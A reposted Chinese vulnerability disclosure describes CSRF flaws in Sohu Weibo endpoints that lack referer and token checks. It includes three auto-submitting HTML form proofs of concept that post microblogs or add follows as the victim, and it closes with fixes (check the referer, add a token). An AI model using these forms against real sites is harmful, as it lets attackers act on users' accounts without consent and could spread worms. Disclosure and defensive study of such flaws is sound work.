欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

搜狐微博的几处CSRF漏洞分析与解决方法

程序员文章站 2022-06-19 11:53:50
搜狐某处CSRF漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布微博... 12-06-27...

搜狐某处csrf漏洞,可能导致蠕虫蔓延,在未经用户同意的情况下发布微博
详细说明:
在接受post和get的信息的时候,未对post来路(referer)进行验证,同时也没有在post的信息中加token验证信息的正确性,导致漏洞产生。

漏洞地址:

复制代码
代码如下:

http://t.sohu.com/t/twaction.jsp
<html> www.jb51.net
<body>
<form id="imlonghao" name="imlonghao" action="http://t.sohu.com/t/twaction.jsp" method="post">
<input type="text" name="msg" value="xx" />
<input type="text" name="act" value="inserttwitter" />
<input type="text" name="groupid" value="0" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>

 接口返回信息
 
 搜狐微博的几处CSRF漏洞分析与解决方法
 
效果

搜狐微博的几处CSRF漏洞分析与解决方法
第二个
 
复制代码
代码如下:

http://t.sohu.com/t/twaction.jsp
<html>
<body>
<form id="imlonghao" name="imlonghao" action="http://t.sohu.com/t/twaction.jsp" method="post">
<input type="text" name="msg" value="xx" />
<input type="text" name="act" value="inserttwitter" />
<input type="text" name="groupid" value="0" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>

 返回信息
搜狐微博的几处CSRF漏洞分析与解决方法
效果
搜狐微博的几处CSRF漏洞分析与解决方法
第三个:
漏洞地址:

复制代码
代码如下:

http://t.sohu.com/follow/addfollows
<html> www.jb51.net
<body>
<form id="imlonghao" name="imlonghao" action="http://t.sohu.com/follow/addfollows" method="post">
<input type="text" name="act" value="follow" />
<input type="text" name="friendids" value="23117291" />
<input type="text" name="uid" value="23117291" />
<input type="submit" value="submit" />
</form>
<script>
document.imlonghao.submit();
</script>
</body>
</html>

 搜狐微博的几处CSRF漏洞分析与解决方法 
接口返回信息 
 搜狐微博的几处CSRF漏洞分析与解决方法
效果 
修复方案:
检查post来路referer
在post的信息中加token

作者:imlonghao